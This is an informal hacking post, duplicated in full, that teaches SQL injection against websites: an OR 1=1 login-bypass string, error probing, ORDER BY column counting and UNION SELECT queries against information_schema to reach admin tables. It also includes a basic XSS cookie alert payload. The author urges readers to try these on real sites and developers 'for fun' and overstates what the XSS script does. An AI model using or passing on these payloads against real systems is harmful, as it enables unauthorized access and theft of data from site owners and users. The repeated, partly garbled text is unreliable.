sql query that can login as default user in most of websites.some duffers that dont know about this types of methodology....use this trick and have grate fun.... ;)
user name :- " OR 1=1 --
password :- " OR 1=1 --
query to retrive the data from the data base without any authentication. but first of all that you have to find out that site is sql vulnerable or not, than have to
find the column name than you can retrive data frome the database and admin table also.....
try on some webdeveloper u think them as duffers..... and enjoy it ,,,,,....... :D
$sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id’] . "’";
• Example : www.site.com/index.php?id=1
• Add ‘ or /* after id= 1 to check whether site is vulnerable or not.
• if site is giving some error/blank page then site is vulnerable to SQL
injection.
• Standard SQL commands such as "Select“ , "Insert”, "Update“,
"Delete“, "Create", and "Drop" can be used to accomplish almost
everything that one needs to do with a database.
• Finding Vulnerable Link on website.
• Finding Vulnerable Columns
• Extracting data from vulnerable columns
• Finding “Admin” table & its column names
• Extracting data from Admin table.
Understanding Error Messages
• Example : www.site.com/index.php?id=1
• Add ‘ or /* after id= 1 to check whether site is vulnerable or not.
• if site is giving some error/blank page then site is vulnerable to SQL
injection.
Finding out Vulnerable Columns
• Example : www.site.com/index.php?id=1+order+by+1 --
• Increase order till you get an error message something like
“Unknown Column in ‘Order’ Clause
Extracting Information from database
www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,
6,7+from+information_schema.tables
• The above mentioned query gives names of tables stored in
database.
www.site.com/index.php?id=1+union+all+select+1,column_name+3,
4,5,6,7+from+information_schema.columns+where+table_schema=c
har()
• The above mentioned query gives names of tables stored in
database.
XSS in Action
Occurs any time…
• Raw data from attacker is sent to an innocent user
• Virtually every web application has this problem
• Try this in your browser – javascript:alert(document.cookie)
use this script on any website to retrive the cookie and get all the information about the website have grate fun enjoy it..... :P :D ;)
<script>alert(document.cookie)</script>
Rv.patel
user name :- " OR 1=1 --
password :- " OR 1=1 --
query to retrive the data from the data base without any authentication. but first of all that you have to find out that site is sql vulnerable or not, than have to
find the column name than you can retrive data frome the database and admin table also.....
try on some webdeveloper u think them as duffers..... and enjoy it ,,,,,....... :D
$sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id’] . "’";
• Example : www.site.com/index.php?id=1
• Add ‘ or /* after id= 1 to check whether site is vulnerable or not.
• if site is giving some error/blank page then site is vulnerable to SQL
injection.
• Standard SQL commands such as "Select“ , "Insert”, "Update“,
"Delete“, "Create", and "Drop" can be used to accomplish almost
everything that one needs to do with a database.
• Finding Vulnerable Link on website.
• Finding Vulnerable Columns
• Extracting data from vulnerable columns
• Finding “Admin” table & its column names
• Extracting data from Admin table.
Understanding Error Messages
• Example : www.site.com/index.php?id=1
• Add ‘ or /* after id= 1 to check whether site is vulnerable or not.
• if site is giving some error/blank page then site is vulnerable to SQL
injection.
Finding out Vulnerable Columns
• Example : www.site.com/index.php?id=1+order+by+1 --
• Increase order till you get an error message something like
“Unknown Column in ‘Order’ Clause
Extracting Information from database
www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,
6,7+from+information_schema.tables
• The above mentioned query gives names of tables stored in
database.
www.site.com/index.php?id=1+union+all+select+1,column_name+3,
4,5,6,7+from+information_schema.columns+where+table_schema=c
har()
• The above mentioned query gives names of tables stored in
database.
XSS in Action
Occurs any time…
• Raw data from attacker is sent to an innocent user
• Virtually every web application has this problem
• Try this in your browser – javascript:alert(document.cookie)
use this script on any website to retrive the cookie and get all the information about the website have grate fun enjoy it..... :P :D ;)
<script>alert(document.cookie)</script>
Rv.patel
